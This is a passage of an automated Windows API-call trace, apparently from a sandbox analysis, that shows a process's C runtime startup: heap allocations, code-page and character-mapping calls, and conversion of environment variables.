Flags=0x8, Size=0x8c) returned 0x770168 [0199.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x770c78 | out: hHeap=0x750000) returned 1 [0199.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x800) returned 0x770200 [0199.594] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x80) returned 0x770a08 [0199.630] GetLastError () returned 0x0 [0199.630] SetLastError (dwErrCode=0x0) [0199.630] GetLastError () returned 0x0 [0199.630] SetLastError (dwErrCode=0x0) [0199.630] GetLastError () returned 0x0 [0199.630] SetLastError (dwErrCode=0x0) [0199.630] GetACP () returned 0x4e4 [0199.630] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x220) returned 0x770a90 [0199.630] GetLastError () returned 0x0 [0199.630] SetLastError (dwErrCode=0x0) [0199.630] IsValidCodePage (CodePage=0x4e4) returned 1 [0199.630] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eb1c | out: lpCPInfo=0x18eb1c) returned 1 [0199.637] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e5e4 | out: lpCPInfo=0x18e5e4) returned 1 [0199.643] GetLastError () returned 0x0 [0199.643] SetLastError (dwErrCode=0x0) [0199.643] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0199.649] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e368, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0199.649] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e5f8 | out: lpCharType=0x18e5f8) returned 1 [0199.649] GetLastError () returned 0x0 [0199.649] SetLastError (dwErrCode=0x0) [0199.649] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0199.649] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e338, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0199.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0199.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e128, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0199.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e8f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ~â§\x1f4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0199.655] GetLastError () returned 0x0 [0199.655] SetLastError (dwErrCode=0x0) [0199.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0199.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e348, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0199.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0199.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e138, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0199.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e7f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ~â§\x1f4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0199.661] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0199.661] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40636c [0199.711] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0199.725] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1f) returned 0x76f3c8 [0199.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x76f3c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0199.739] GetLastError () returned 0x0 [0199.739] SetLastError (dwErrCode=0x0) [0199.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x771f68 [0199.739] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771f68) returned 0x4 [0199.739] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771f68, Size=0x8) returned 0x771f68 [0199.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0199.739] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x771f78 [0199.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x771f78, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0199.740] GetLastError () returned 0x0 [0199.740] SetLastError (dwErrCode=0x0) [0199.740] GetLastError () returned 0x0 [0199.740] SetLastError (dwErrCode=0x0) [0199.740] GetLastError () returned 0x0 [0199.740] SetLastError (dwErrCode=0x0) [0199.746] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771f68) returned 0x8 [0199.746] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771f68, Size=0xc) returned 0x771fb8 [0199.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0199.746] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x37) returned 0x770cb8 [0199.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x770cb8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0199.746] GetLastError () returned 0x0 [0199.746] SetLastError (dwErrCode=0x0) [0199.746] GetLastError () returned 0x0 [0199.746] SetLastError (dwErrCode=0x0) [0199.746] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0xc [0199.747] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x10) returned 0x771fb8 [0199.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0199.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x765aa8 [0199.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x765aa8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x10 [0199.747] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x14) returned 0x771fb8 [0199.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0199.747] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x31) returned 0x770cf8 [0199.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x770cf8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0199.747] GetLastError () returned 0x0 [0199.747] SetLastError (dwErrCode=0x0) [0199.747] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x14 [0199.748] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x18) returned 0x771fb8 [0199.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0199.748] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x770d38 [0199.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x770d38, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.748] SetLastError (dwErrCode=0x0) [0199.748] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x18 [0199.749] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x1c) returned 0x771fb8 [0199.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0199.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76ad68 [0199.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x76ad68, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 